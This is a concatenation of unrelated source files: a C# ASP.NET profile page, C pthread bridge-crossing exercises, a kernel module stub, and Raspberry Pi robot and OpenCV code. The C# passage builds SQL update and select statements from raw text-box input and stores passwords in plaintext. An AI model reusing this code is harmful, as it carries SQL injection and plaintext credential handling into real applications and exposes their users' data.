cmd.CommandText = "update utilizator set prenume='" + TextBoxPrenume.Text + "' where acont='" + Session["nume"].ToString() + "';";
cmd.CommandType = CommandType.Text;
cmd.ExecuteNonQuery();
LabelPrenume.Text = TextBoxPrenume.Text;
}
else
{
TextBoxPrenume.Visible = true;
TextBoxPrenume.Text = LabelPrenume.Text;
}
sqlConnection1.Close();
}
protected void Buttonschimbaparola(object sender, EventArgs e)
{
if (Panelschimbaparola.Visible == false)
Panelschimbaparola.Visible = true;
else Panelschimbaparola.Visible = false;
}
protected void Buttonschimba_Click(object sender, EventArgs e)
{
Labelparolaeroare.Text = "";
SqlCommand cmd = new SqlCommand();
sqlConnection1.Open();
cmd.Connection = sqlConnection1;
cmd.CommandText = "select parola from utilizator where acont='" + Session["nume"].ToString() + "';";
cmd.CommandType = CommandType.Text;
if (TextBoxparola.Text != cmd.ExecuteScalar().ToString())
{
Labelparolaeroare.Text = "Parola veche incorecta!";
return;
}
if (TextBoxparolan.Text != TextBoxparolan2.Text)
{
Labelparolaeroare.Text = "Eroare confirmare parola noua!";
return;
}
cmd.CommandText = "update utilizator set parola='" + TextBoxparolan.Text + "' where acont='" + Session["nume"].ToString() + "';";
cmd.CommandType = CommandType.Text;
cmd.ExecuteNonQuery();
Labelparolaeroare.Text = "Parola modificat cu succes!";
sqlConnection1.Close();
}
protected void afisareEvenimenteOrganizate()
{
SqlCommand cmd = new SqlCommand();
int invitatiiExista = 0;
try
{
String query = "SELECT count(id_eveniment) from organizeaza where id_organizator = " + Session["id"] + " and aprobat=1;";
sqlConnection1.Open();
cmd.CommandText = query;
cmd.CommandType = CommandType.Text;
cmd.Connection = sqlConnection1;
invitatiiExista = Convert.ToInt32(cmd.ExecuteScalar());
}
catch (Exception ex)
{
LabelMesajEroare.Text = "Nu merge " + ex.Message;
}
sqlConnection1.Close();
if (invitatiiExista != 0)
{
try
{
String query = "SELECT id_eveniment from organizeaza where id_organizator = " + Session["id"] + " and aprobat=1;";
sqlConnection1.Open();
cmd.CommandText = query;
cmd.CommandType = CommandType.Text;
cmd.Connection = sqlConnection1;
DataTable Table_Evenimente = new DataTable();
if (Table_Evenimente.Columns.Count == 0)
{
Table_Evenimente.Columns.Add("ID", typeof(int));
Table_Evenimente.Columns.Add("Nume", typeof(string));
Table_Evenimente.Columns.Add("Data", typeof(string));
Table_Evenimente.Columns.Add("Oras", typeof(string));
}
List<int> idFiecareEveniment = new List<int>();
using (SqlDataReader fiecareEvenimentLaCareEsteOrganizator = cmd.ExecuteReader())
{
while (fiecareEvenimentLaCareEsteOrganizator.Read())
{
idFiecareEveniment.Add(fiecareEvenimentLaCareEsteOrganizator.GetInt32(fiecareEvenimentLaCareEsteOrganizator.GetOrdinal("id_eveniment")));
}
fiecareEvenimentLaCareEsteOrganizator.Close();
}
foreach (int idEvent in idFiecareEveniment)
{
query = "SELECT id,nume,data_inceperii,oras from evenimente where id = " + idEvent;
cmd.CommandText = query;
SqlDataReader InfoEvenimente = cmd.ExecuteReader();
while (InfoEvenimente.Read())
{
                        DataRow NewRow = Table_Evenimente.NewRow(); // a new row
NewRow[0] = InfoEvenimente.GetInt32(0);
NewRow[1] = InfoEvenimente.GetString(1);
NewRow[2] = InfoEvenimente.GetDateTime(2).ToString("dd MM yyyy");
//LabelMesajEroare.Text += " Opa ";
NewRow[3] = InfoEvenimente.GetString(3);
//LabelMesajEroare.Text += " Opa ";
Table_Evenimente.Rows.Add(NewRow);
}
InfoEvenimente.Close();
}
GridView_listaEvenimenteOrganizate.DataSource = Table_Evenimente;
GridView_listaEvenimenteOrganizate.DataBind();
                int index_eveniment = 0; // for each event ID
foreach (GridViewRow row in GridView_listaEvenimenteOrganizate.Rows)
{
int i = 0;
LinkButton accepta = new LinkButton();
accepta.ID = "a" + idFiecareEveniment[index_eveniment].ToString(); //fiecare buton are id-ul evenimentului pe care il refera
accepta.Text = "Renunta";
accepta.Click += new EventHandler(refuzaCaOrganizator);
row.Cells[i].Controls.Add(accepta);
i++;
LinkButton linkCatreEveniment= new LinkButton();
linkCatreEveniment.ID = "l" + idFiecareEveniment[index_eveniment].ToString();
linkCatreEveniment.Text = "Click";
linkCatreEveniment.Click += new EventHandler(catrePaginaEveniment);
row.Cells[i].Controls.Add(linkCatreEveniment);
index_eveniment++;
}
}
catch (Exception ex)
{
LabelMesajEroare.Text += "Nu merrrrge " + ex.Message;
}
sqlConnection1.Close();
GridView_listaEvenimenteOrganizate.Visible = true;
}
}
protected void refuzaCaOrganizator(object sender, EventArgs e)
{
LinkButton eveniment = (LinkButton)sender;
int idEveniment = 0;
if (eveniment.Text == "Renunta")
{
idEveniment = Convert.ToInt32(eveniment.ID.Substring(1));
}
SqlCommand cmd = new SqlCommand();
try
{
String query = "Delete from organizeaza where id_eveniment = " + idEveniment + " and id_organizator = " + Session["id"];
sqlConnection1.Open();
cmd.CommandText = query;
cmd.CommandType = CommandType.Text;
cmd.Connection = sqlConnection1;
cmd.ExecuteNonQuery();
}
catch (Exception ex)
{
LabelMesajEroare.Text = "Nu merge " + ex.Message;
}
sqlConnection1.Close();
Response.Redirect("profil.aspx");
}
protected void catrePaginaEveniment(object sender, EventArgs e)
{
LinkButton eveniment = (LinkButton)sender;
int idEveniment = 0;
if (eveniment.Text == "Click")
{
idEveniment = Convert.ToInt32(eveniment.ID.Substring(1));
}
Session["IdEvenimentSelectat"] = idEveniment;
// SearchBox.Text = Session["IdEvenimentSelectat"].ToString();
Response.Redirect("Eveniment.aspx");
}
}
<repo_name>santhi-swaroop/assignment<file_sep>/os.c
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include<string.h>
#include<unistd.h>
#include <signal.h>
struct bridge {
int north_waiting;
int north_crossing;
int north_consecutive;
int south_waiting;
int south_crossing;
int south_consecutive;
pthread_mutex_t lock;
pthread_cond_t northbound_done;
pthread_cond_t southbound_done;
};
void bridge_init(struct bridge *b)
{
b->north_waiting = 0;
    b->north_crossing = 0;
b->north_consecutive = 0;
b->south_waiting = 0;
b->south_crossing = 0;
b->south_consecutive = 0;
pthread_mutex_init(&b->lock, NULL);
    pthread_cond_init(&b->northbound_done, NULL); /* attr must be NULL or a condattr, not the mutex */
    pthread_cond_init(&b->southbound_done, NULL);
}
void *bridge_arrive_north(void * br)
{
struct bridge * b = (struct bridge *) br;
printf("NORTH car has arrived\n");
pthread_mutex_lock(&b->lock);
b->north_waiting++;
while ((b->south_crossing > 0) || ((b->south_waiting > 0) && (b->north_consecutive >= 5))) {
pthread_cond_wait(&b->southbound_done, &b->lock);
}
printf("NORTH car is on bridge\n");
b->north_waiting--;
b->north_crossing++;
b->north_consecutive++;
b->south_consecutive = 0;
pthread_mutex_unlock(&b->lock);
    // bridge_leave_north(b);
    return NULL;
}
void *bridge_leave_north(void *br) /* thread signature, so it can be passed to pthread_create */
{
    struct bridge *b = (struct bridge *) br;
    pthread_mutex_lock(&b->lock);
b->north_crossing--;
if (b->north_crossing == 0) {
pthread_cond_broadcast(&b->northbound_done);
}
pthread_mutex_unlock(&b->lock);
printf("NORTH car has left the bridge\n");
}
void *bridge_arrive_south(void * br)
{
struct bridge * b = (struct bridge *) br;
printf("SOUTH car has arrived\n");
pthread_mutex_lock(&b->lock);
b->south_waiting++;
while ((b->north_crossing > 0) || ((b->north_waiting > 0) && (b->south_consecutive >= 5))) {
pthread_cond_wait(&b->northbound_done, &b->lock);
}
printf("SOUTH car is on bridge\n");
b->south_waiting--;
b->south_crossing++;
b->south_consecutive++;
b->north_consecutive = 0;
pthread_mutex_unlock(&b->lock);
    // bridge_leave_south(b);
    return NULL;
}
void *bridge_leave_south(void *br) /* thread signature, so it can be passed to pthread_create */
{
    struct bridge *b = (struct bridge *) br;
    pthread_mutex_lock(&b->lock);
b->south_crossing--;
if (b->south_crossing == 0) {
pthread_cond_broadcast(&b->southbound_done);
}
pthread_mutex_unlock(&b->lock);
printf("SOUTH car has left the bridge\n");
}
int main() {
    struct bridge b;
    pthread_t tid[20];
    bridge_init(&b); /* initialise the mutex and condition variables before any thread uses them */
pthread_create(&tid[0],NULL,bridge_arrive_north,(void *)&b);
pthread_create(&tid[1],NULL,bridge_arrive_north,(void *)&b);
pthread_create(&tid[2],NULL,bridge_arrive_north,(void *)&b);
pthread_create(&tid[3],NULL,bridge_arrive_south,(void *)&b);
pthread_create(&tid[4],NULL,bridge_arrive_south,(void *)&b);
pthread_create(&tid[5],NULL,bridge_arrive_north,(void *)&b);
pthread_create(&tid[6],NULL,bridge_arrive_north,(void *)&b);
pthread_create(&tid[7],NULL,bridge_arrive_north,(void *)&b);
    for(int i=0;i<8;i++){
        pthread_join(tid[i],NULL);
        if(i!=3 && i!=4) /* threads 3 and 4 arrived southbound above */
            pthread_create(&tid[i+10],NULL,bridge_leave_north,(void *)&b);
        else
            pthread_create(&tid[i+10],NULL,bridge_leave_south,(void *)&b);
    }
    for(int i=10;i<18;i++){
        pthread_join(tid[i],NULL); /* wait for the leave threads as well */
    }
return 0;
}
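/* Build sketch (an assumption, not part of the original file):
 *   gcc os.c -o bridge1 -lpthread
 * the condition variables and threads require linking against pthreads. */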
<file_sep>/os2.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <pthread.h>
#define BRIDGE_DIRECTION_NORTH 0x01
#define BRIDGE_DIRECTION_SOUTH 0x02
typedef struct bridge
{
int cars;
int direction;
pthread_mutex_t mutex;
pthread_cond_t empty;
} bridge_t;
static bridge_t shared_bridge = {.cars = 0,.direction = BRIDGE_DIRECTION_SOUTH,.mutex = PTHREAD_MUTEX_INITIALIZER,.empty = PTHREAD_COND_INITIALIZER
};
static void arrive(bridge_t *bridge, int direction)
{
pthread_mutex_lock(&bridge->mutex);
    /* wait while the bridge carries opposing traffic, or is already full (at most 5 cars) */
    while (bridge->cars > 0 && (bridge->cars >= 5 || bridge->direction != direction))
        pthread_cond_wait(&bridge->empty, &bridge->mutex);
if (bridge->cars == 0)
bridge->direction = direction;
bridge->cars++;
if(bridge->direction==1)
printf("crossing south to north\t num of cars on bridge = %d \n", bridge->cars);
else
printf("crossing north to south\t num of cars on bridge = %d \n", bridge->cars);
    pthread_mutex_unlock(&bridge->mutex); /* release the lock while the car is crossing */
}
static void leave(bridge_t *bridge)
{
pthread_mutex_lock(&bridge->mutex);
bridge->cars--;
    pthread_cond_broadcast(&bridge->empty); /* wake every waiter; the direction may flip */
pthread_mutex_unlock(&bridge->mutex);
}
static void drive(bridge_t *bridge, int direction)
{
    arrive(bridge, direction);
    sleep(1); /* crossing time, spent outside the mutex so cars can overlap */
    leave(bridge);
}
static void* north(void *data)
{
drive((bridge_t *) data, BRIDGE_DIRECTION_NORTH);
return NULL;
}
static void* south(void *data)
{
drive((bridge_t *) data, BRIDGE_DIRECTION_SOUTH);
return NULL;
}
static int run(int ns, int nn)
{
int i, n = ns + nn;
pthread_t thread[n];
for (i = 0; i < n; i++)
        if (pthread_create(&thread[i], NULL, i < ns ? south : north, &shared_bridge))
{
printf("thread creation failed\n");
return EXIT_FAILURE;
}
for (i = 0; i < n; i++)
if (thread[i])
pthread_join(thread[i], NULL);
return EXIT_SUCCESS;
}
int main(int argc, char **argv)
{
    int ns = 0, nn = 0;
printf("Enter the South and North cars:");
scanf("%d %d",&ns,&nn);
if (nn <= 0){
printf("number of cars going north must be > 0\n");
exit(EXIT_FAILURE);
}
else if (ns <= 0) {
printf("number of cars going south must be > 0\n");
exit(EXIT_FAILURE);
}
return run(ns, nn);
}
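/* Example session (an illustrative assumption): running the binary and entering
 * "3 4" at the prompt creates 3 southbound and 4 northbound car threads; each
 * prints its crossing direction and the current number of cars on the bridge. */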
<file_sep>#include <linux/module.h>
#include <linux/vermagic.h>
#include <linux/compiler.h>
MODULE_INFO(vermagic, VERMAGIC_STRING);
__visible struct module __this_module
__attribute__((section(".gnu.linkonce.this_module"))) = {
.name = KBUILD_MODNAME,
.init = init_module,
#ifdef CONFIG_MODULE_UNLOAD
.exit = cleanup_module,
#endif
.arch = MODULE_ARCH_INIT,
};
static const struct modversion_info ____versions[]
__used
__attribute__((section("__versions"))) = {
{ 0x331df01a, __VMLINUX_SYMBOL_STR(module_layout) },
{ 0x38f8fbac, __VMLINUX_SYMBOL_STR(usb_deregister) },
{ 0x66dae54, __VMLINUX_SYMBOL_STR(usb_register_driver) },
{ 0xfbc74f64, __VMLINUX_SYMBOL_STR(__copy_from_user) },
{ 0x659a3410, __VMLINUX_SYMBOL_STR(usb_alloc_coherent) },
{ 0x1afae5e7, __VMLINUX_SYMBOL_STR(down_interruptible) },
{ 0x4d41feb2, __VMLINUX_SYMBOL_STR(kmalloc_caches) },
{ 0x5d3af1c7, __VMLINUX_SYMBOL_STR(usb_alloc_urb) },
{ 0x12da5bb2, __VMLINUX_SYMBOL_STR(__kmalloc) },
{ 0xa9076c40, __VMLINUX_SYMBOL_STR(usb_register_dev) },
{ 0x35a58ba9, __VMLINUX_SYMBOL_STR(usb_get_dev) },
{ 0x275ef902, __VMLINUX_SYMBOL_STR(__init_waitqueue_head) },
{ 0xfa2a45e, __VMLINUX_SYMBOL_STR(__memzero) },
{ 0x7ff75090, __VMLINUX_SYMBOL_STR(kmem_cache_alloc_trace) },
{ 0x71d8b5d7, __VMLINUX_SYMBOL_STR(usb_kill_urb) },
{ 0x17e3f7be, __VMLINUX_SYMBOL_STR(_dev_info) },
{ 0xe9e34fd5, __VMLINUX_SYMBOL_STR(usb_deregister_dev) },
{ 0x3b821b8b, __VMLINUX_SYMBOL_STR(usb_free_urb) },
{ 0x37a0cba, __VMLINUX_SYMBOL_STR(kfree) },
{ 0x97cf203b, __VMLINUX_SYMBOL_STR(usb_put_dev) },
{ 0x1cfb04fa, __VMLINUX_SYMBOL_STR(finish_wait) },
{ 0x344b7739, __VMLINUX_SYMBOL_STR(prepare_to_wait_event) },
{ 0x1000e51, __VMLINUX_SYMBOL_STR(schedule) },
{ 0xf473ffaf, __VMLINUX_SYMBOL_STR(down) },
{ 0xad3706b1, __VMLINUX_SYMBOL_STR(usb_bulk_msg) },
{ 0xc1b18a5, __VMLINUX_SYMBOL_STR(usb_free_coherent) },
{ 0xd85cd67e, __VMLINUX_SYMBOL_STR(__wake_up) },
{ 0x4be7fb63, __VMLINUX_SYMBOL_STR(up) },
{ 0x9d669763, __VMLINUX_SYMBOL_STR(memcpy) },
{ 0xe9bff861, __VMLINUX_SYMBOL_STR(down_trylock) },
{ 0xecc20572, __VMLINUX_SYMBOL_STR(usb_submit_urb) },
{ 0x67c2fa54, __VMLINUX_SYMBOL_STR(__copy_to_user) },
{ 0x2e5810c6, __VMLINUX_SYMBOL_STR(__aeabi_unwind_cpp_pr1) },
{ 0x16305289, __VMLINUX_SYMBOL_STR(warn_slowpath_null) },
{ 0x27e1a049, __VMLINUX_SYMBOL_STR(printk) },
{ 0x917107f1, __VMLINUX_SYMBOL_STR(usb_find_interface) },
{ 0xb1ad28e0, __VMLINUX_SYMBOL_STR(__gnu_mcount_nc) },
};
static const char __module_depends[]
__used
__attribute__((section(".modinfo"))) =
"depends=";
MODULE_ALIAS("usb:v08DApFC00d*dc*dsc*dp*ic*isc*ip*in*");
MODULE_ALIAS("usb:v0FF8p0001d*dc*dsc*dp*ic*isc*ip*in*");
MODULE_INFO(srcversion, "3EB956F3CE48B57C8DC9BEF");
<file_sep>class TestApp implements IApplication {
public void Start(){
System.out.println("Start");
}
public void Update(){
System.out.println("Update");
}
public void Quit(){
System.out.println("Quit");
}
public int Cleanup(){
System.out.println("Cleanup done");
return 0;
}
public void Order(String word){
System.out.println(word);
}
public boolean IsRunning(){
return true;
}
}
<file_sep>public class PinkyuApp implements IApplication {
int x,y;
PinkyuTester pinkyu1 = PinkyuTester.INSTANCE;
public void Start() {
AudioLib.INSTANCE.play("ZensokuZensin.wav");
pinkyu1.main();
ArmLib.INSTANCE.init();
ArmLib.INSTANCE.lower();
ArmLib.INSTANCE.arm_open();
ArmLib.INSTANCE.arm_close();
ArmLib.INSTANCE.raise();
}
public void Quit() {
AudioLib.INSTANCE.play("MutekiSaikyo.wav");
pinkyu1 = null;
}
public void Update() {
}
public int Cleanup() {
return 0;
}
public void Order(String word) {
if (word.equals("pick")) {
//SurvoLib.INSTANCE.closeArm();
}
}
public boolean IsRunning(){
return true;
}
}
<file_sep>#include <stdio.h>
#include <wiringPi.h>
#include <string.h>
#include <unistd.h>
void setup_survo() {
if (wiringPiSetupGpio() == -1) {
fprintf(stderr, "WiringPi Initialize Error\n");
return;
}
pinMode(12,PWM_OUTPUT);
pwmSetMode(PWM_MODE_MS);
pwmSetClock(375);
pwmSetRange(1024);
printf("open, close, end, stop, or auto\n");
}
void openArm() {
printf("open arm\n");
    pwmWrite(12, 125); // the arm opens
sleep(5);
pwmWrite(12,75);
}
void closeArm() {
printf("close arm\n");
    pwmWrite(12, 25); // the arm closes
sleep(5);
pwmWrite(12, 75);
}
void stop() {
printf("stop movement\n");
    pwmWrite(12, 75); // pause
}
void end() {
printf("end of program\n");
}
void automatic() {
printf("auto\n");
pwmWrite(12,125);
sleep(3);
pwmWrite(12,75);
sleep(1);
pwmWrite(12, 25);
sleep(3);
pwmWrite(12,75);
printf("auto finish\n");
}
int main() {
setup_survo();
openArm();
return 0;
}
<file_sep>public final class Shooter {
    // Delegates to the native shooter routines through the JNA binding.
    void shoot()
    {
        ShooterLib.INSTANCE.start_moter();
    }
    void stop_shoot()
    {
        ShooterLib.INSTANCE.stop_moter();
    }
}<file_sep>import com.sun.jna.Library;
import com.sun.jna.Native;
public interface SurvoLib extends Library {
    // The first argument to loadLibrary must match the *** part of the lib***.so built later.
String path = "/home/pi/work/robot/RobotPrograms/libsurvo12_ex.so";
SurvoLib INSTANCE = (SurvoLib) Native.loadLibrary(path, SurvoLib.class);
    // These must match the C function names.
void setup_survo();
void openArm();
void closeArm();
void stop();
void end();
void automatic();
}
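// Usage sketch (an assumption, not part of the original sources): driving the
// arm through the binding above.
//   SurvoLib arm = SurvoLib.INSTANCE;
//   arm.setup_survo();
//   arm.openArm();
//   arm.closeArm();
//   arm.end();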
<file_sep>#include <stdio.h>
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>
#include "/usr/include/linux/i2c-dev.h"
#include <signal.h>
#include "move_api.h"
void quit_func(int sig);
int quit_flg = 0;
int main( void ) {
int fd;
char filename[ 20 ];
char buf[ 10 ];
int res;
int range = 0;
//set signal handler
signal(SIGINT, quit_func);
// I2Cデータバスをオープン
sprintf( filename, "/dev/i2c-1" );
fd = open( filename, O_RDWR );
if ( fd < 0 ) {
printf( "Error on open\n" );
exit( 1 );
}
    if ( ioctl( fd, I2C_SLAVE, ( 0xE2 >> 1 ) ) < 0 ) { // 0xE2 (0b11100010) >> 1 = 0x71 (0b01110001)
printf( "Error on slave address 0xE2\n" );
exit( 1 );
}
//setup movement
g_init();
while(!quit_flg)
{ // read from 0xE2
buf[ 0 ] = 0x00;
buf[ 1 ] = 0x51;
if ( ( write( fd, buf, 2 ) ) != 2 ) {
printf( "0xE2 Error send the read command\n" );
exit( 1 );
}
// Wait for the measurement
usleep( 66000 );
buf[ 0 ] = 0x02;
if ( ( write( fd, buf, 1 ) ) != 1 ) {
printf( "0xE2 Error on select the Range High Byte\n" );
exit( 1 );
}
if ( ( read( fd, buf, 1 ) ) != 1 ) {
printf( "0xE2 Error on read the Range High Byte\n" );
exit( 1 );
}
range = buf[ 0 ] << 8;
buf[ 0 ] = 0x03;
if ( ( write( fd, buf, 1 ) ) != 1 ) {
printf( "0xE2 Error on select the Range Low Byte\n" );
exit( 1 );
}
if ( ( read( fd, buf, 1 ) ) != 1 ) {
printf( "0xE2 Error on read the Range Low Byte\n" );
exit( 1 );
}
range |= buf[ 0 ];
printf("0xE2 Range=%d cm\n",range);
if(range <= 10){
g_stop();
}else{
g_go_straight(1,range);
}
}
g_quit();
close( fd );
return 0;
}
void quit_func(int sig){
printf("quit\n");
quit_flg = 1;
}
<file_sep>// Module "core"
#include <opencv2/core/core.hpp>
// Module "highgui"
#include <opencv2/highgui/highgui.hpp>
// Module "imgproc"
#include <opencv2/imgproc/imgproc.hpp>
// Module "video"
#include <opencv2/video/video.hpp>
// Output
#include <iostream>
// Vector
#include <vector>
using namespace cv;
using namespace std;
int main(int argc, char** argv)
{
VideoCapture cap(0); //capture the video from web cam
int notFoundCount=0;
bool found=false;
if (!cap.isOpened()) // if not success, exit program
{
cout << "Cannot open the web cam" << endl;
return -1;
}
int measSize = 4;
int stateSize = 6;
int contrSize = 0;
unsigned int type = CV_32F;
KalmanFilter kf(stateSize, measSize, contrSize, type);
Mat meas(measSize, 1, type);
Mat state(stateSize, 1, type);
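    // Note (an illustrative assumption, not in the original): for kf.predict()
    // to be meaningful, a constant-velocity model would also initialise
    // kf.transitionMatrix, kf.measurementMatrix and the noise covariances here,
    // e.g. cv::setIdentity(kf.measurementNoiseCov, cv::Scalar(1e-1)).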
namedWindow("Control", CV_WINDOW_AUTOSIZE); //create a window called "Control"
int iLowH = 0;
int iHighH = 179;
int iLowS = 0;
int iHighS = 255;
int iLowV = 0;
int iHighV = 255;
//Create trackbars in "Control" window
cvCreateTrackbar("LowH", "Control", &iLowH, 179); //Hue (0 - 179)
cvCreateTrackbar("HighH", "Control", &iHighH, 179);
cvCreateTrackbar("LowS", "Control", &iLowS, 255); //Saturation (0 - 255)
cvCreateTrackbar("HighS", "Control", &iHighS, 255);
cvCreateTrackbar("LowV", "Control", &iLowV, 255); //Value (0 - 255)
cvCreateTrackbar("HighV", "Control", &iHighV, 255);
while (true)
{
Mat imgOriginal;
bool bSuccess = cap.read(imgOriginal); // read a new frame from video
if (!bSuccess) //if not success, break loop
{
cout << "Cannot read a frame from video stream" << endl;
break;
}
Mat imgHSV;
cvtColor(imgOriginal, imgHSV, COLOR_BGR2HSV); //Convert the captured frame from BGR to HSV
Mat imgThresholded;
inRange(imgHSV, Scalar(iLowH, iLowS, iLowV), Scalar(iHighH, iHighS, iHighV), imgThresholded); //Threshold the image
//morphological opening (remove small objects from the foreground)
erode(imgThresholded, imgThresholded, getStructuringElement(MORPH_ELLIPSE, Size(5, 5)));
dilate(imgThresholded, imgThresholded, getStructuringElement(MORPH_ELLIPSE, Size(5, 5)));
//morphological closing (fill small holes in the foreground)
dilate(imgThresholded, imgThresholded, getStructuringElement(MORPH_ELLIPSE, Size(5, 5)));
erode(imgThresholded, imgThresholded, getStructuringElement(MORPH_ELLIPSE, Size(5, 5)));
vector<vector<cv::Point>> contours;
findContours(imgThresholded, contours, CV_RETR_EXTERNAL,
CV_CHAIN_APPROX_NONE);
// >>>>> Filtering
vector<vector<cv::Point> > balls;
vector<cv::Rect> ballsBox;
for (size_t i = 0; i < contours.size(); i++)
{
cv::Rect bBox;
bBox = cv::boundingRect(contours[i]);
float ratio = (float)bBox.height / (float)bBox.width;
            // Keep tall boxes: height between 2x and 6x the width, with enough area
            if (ratio > 2.0 && bBox.area() >= 400 && ratio < 6.0)
{
balls.push_back(contours[i]);
ballsBox.push_back(bBox);
}
}
for (size_t i = 0; i < balls.size(); i++)
{
cv::drawContours(imgOriginal, balls, i, CV_RGB(20, 150, 20), 1);
cv::rectangle(imgOriginal, ballsBox[i], CV_RGB(0, 255, 0), 2);
cv::Point center;
center.x = ballsBox[i].x + ballsBox[i].width / 2;
center.y = ballsBox[i].y + ballsBox[i].height / 2;
cv::circle(imgOriginal, center, 2, CV_RGB(20, 150, 20), -1);
stringstream sstr;
sstr << "(" << center.x << "," << center.y << ")";
cv::putText(imgOriginal, sstr.str(),
cv::Point(center.x + 3, center.y - 3),
cv::FONT_HERSHEY_SIMPLEX, 0.5, CV_RGB(20, 150, 20), 2);
cout << center.x << ", " << center.y << endl;
}
if (balls.size() == 0)
{
notFoundCount++;
cout << "notFoundCount:" << notFoundCount << endl;
if (notFoundCount >= 100)
{
found = false;
}
/*else
kf.statePost = state;*/
}
else
{
notFoundCount = 0;
meas.at<float>(0) = ballsBox[0].x + ballsBox[0].width / 2;
meas.at<float>(1) = ballsBox[0].y + ballsBox[0].height / 2;
meas.at<float>(2) = (float)ballsBox[0].width;
meas.at<float>(3) = (float)ballsBox[0].height;
if (!found) // First detection!
{
// >>>> Initialization
kf.errorCovPre.at<float>(0) = 1; // px
kf.errorCovPre.at<float>(7) = 1; // px
kf.errorCovPre.at<float>(14) = 1;
kf.errorCovPre.at<float>(21) = 1;
kf.errorCovPre.at<float>(28) = 1; // px
kf.errorCovPre.at<float>(35) = 1; // px
state.at<float>(0) = meas.at<float>(0);
state.at<float>(1) = meas.at<float>(1);
state.at<float>(2) = 0;
state.at<float>(3) = 0;
state.at<float>(4) = meas.at<float>(2);
state.at<float>(5) = meas.at<float>(3);
// <<<< Initialization
found = true;
}
else
kf.correct(meas); // Kalman Correction
//cout << "Measure matrix:" << endl << meas << endl;
}
imshow("Thresholded Image", imgThresholded); //show the thresholded image
imshow("Original", imgOriginal); //show the original image
if (waitKey(30) == 27) //wait for 'esc' key press for 30ms. If 'esc' key is pressed, break loop
{
cout << "esc key is pressed by user" << endl;
break;
}
}
return 0;
}<file_sep>#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <wiringPi.h>
#include <unistd.h>
#define MOTOROUT1 14
#define MOTOROUT2 15
void setup_lift() {
if ( wiringPiSetupGpio() == -1) {
printf("setup error");
return;
}
pinMode(MOTOROUT1, OUTPUT);
pinMode(MOTOROUT2, OUTPUT);
digitalWrite(MOTOROUT1, 0);
digitalWrite(MOTOROUT2, 0);
}
void up() {
digitalWrite(MOTOROUT1, 1);
sleep(3);
digitalWrite(MOTOROUT1, 0);
}
void down() {
digitalWrite(MOTOROUT2, 1);
sleep(3);
digitalWrite(MOTOROUT2, 0);
}
void stop() {
digitalWrite(MOTOROUT1, 0);
digitalWrite(MOTOROUT2, 0);
}
<file_sep>#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <wiringPi.h>
#include <wiringPiSPI.h>
#define DEBUG 0
#define SPI_CHANNEL 0
#define SS_PORT 8
int main(int argc, char **argv){
int retCode;
int i;
int a2dChannel = atoi(argv[1]); // analog channel
int a2dVal = 0;
float a2dVol = 0;
float Vref = 5;
printf("Channel:%d\n", a2dChannel);
unsigned char data[3];
    // Start SPI channel 0 at 1 MHz.
if (wiringPiSPISetup(SPI_CHANNEL, 1000000) < 0)
{
printf("SPISetup failed:\n");
return 0;
}
if (wiringPiSetupGpio() == -1) {
printf("GPIO set up error\n");
return 0;
}
pinMode(SS_PORT, OUTPUT);
digitalWrite(SS_PORT, 1);
while(1) {
data[0] = 0b00000110 |( ((a2dChannel & 0x04) >> 2)); // first byte transmitted -> start bit -> (SGL/DIF = 1,D2=0)
data[1] = 0b00000000 |( ((a2dChannel & 0x03) << 6)); // second byte transmitted -> (D1=D0=0)
data[2] = 0; // third byte transmitted....don't care
digitalWrite(SS_PORT, 0);
retCode=wiringPiSPIDataRW (SPI_CHANNEL,data,sizeof(data));
digitalWrite(SS_PORT, 1);
a2dVal = (data[1]<< 8) & 0b111100000000; //first 4 bit
a2dVal |= (data[2] & 0xff);
a2dVol = (float)a2dVal/4095 * Vref;
printf("a2dVal=%d\n",a2dVal);
printf("a2dVol=%f[V]\n",a2dVol);
sleep(1);
}
}
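/* Illustrative helper (an assumption, not part of the original file): the
 * 3-byte MCP3208 exchange from the loop above, factored into one function. */
static int read_mcp3208(int channel) {
    unsigned char d[3];
    int val;
    d[0] = 0b00000110 | ((channel & 0x04) >> 2); /* start bit, single-ended, D2 */
    d[1] = (unsigned char)((channel & 0x03) << 6); /* D1, D0 */
    d[2] = 0;                                      /* don't care */
    digitalWrite(SS_PORT, 0);
    wiringPiSPIDataRW(SPI_CHANNEL, d, sizeof(d));
    digitalWrite(SS_PORT, 1);
    val = (d[1] << 8) & 0b111100000000; /* top 4 bits of the 12-bit result */
    val |= (d[2] & 0xff);               /* low 8 bits */
    return val;                         /* 0..4095 */
}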
<file_sep>import com.sun.jna.Library;
import com.sun.jna.Native;
public interface ShooterLib1 extends Library {
    // The first argument to loadLibrary must match the *** part of the lib***.so built later.
String path = "/home/pi/work/robot/RobotPrograms/libshoot.so";
ShooterLib1 INSTANCE = (ShooterLib1) Native.loadLibrary(path, ShooterLib1.class);
    // These must match the C function names.
void start_moter();
void stop_moter();
}
<file_sep>#include <stdio.h>
#include <wiringPi.h>
#include <wiringPiSPI.h>
#include <string.h>
/* Stub implementations: each function is declared int, so each must return a value. */
int init(){
    printf("Init!\n");
    return 0;
}
int arm_open(){
    printf("Open!\n");
    return 0;
}
int arm_close() {
    printf("Close!\n");
    return 0;
}
int arm_fclose(){
    printf("Fclose!\n");
    return 0;
}
int raise(){
    printf("Raise!\n");
    return 0;
}
int lower(){
    printf("Lower!\n");
    return 0;
}
int lower_t(int time){
    printf("Lower_t!\n");
    return 0;
}
int stop() {
    printf("Stop!\n");
    return 0;
}
int quit(){
    printf("Quit!\n");
    return 0;
}
<file_sep>#include <opencv2/core.hpp>
#include <opencv2/videoio.hpp>
#include <opencv2/highgui.hpp>
#include <opencv2/video/tracking.hpp>
#include <opencv2/imgproc.hpp>
#include <opencv2/face.hpp>
#include <opencv2/objdetect.hpp>
#include <iostream>
#include <fstream>
#include <sstream>
#include <vector>
#include <sys/stat.h>
#include <sys/types.h>
#define CAMERA_U_IDX 0
#define PIX_LEN 300
using namespace cv;
using namespace cv::face;
using namespace std;
string fn_haar = "/usr/local/Cellar/opencv3/3.2.0/share/OpenCV/haarcascades/haarcascade_frontalface_default.xml";
string fn_csv = "/Users/okuokakouhei/java/eclipse/RobotCV/face.csv";
static void read_csv(const string& filename, vector<Mat>& images, vector<int>& labels, char separator = ';') {
std::ifstream file(filename.c_str(), ifstream::in);
if (!file) {
string error_message = "No valid input file was given, please check the given filename.";
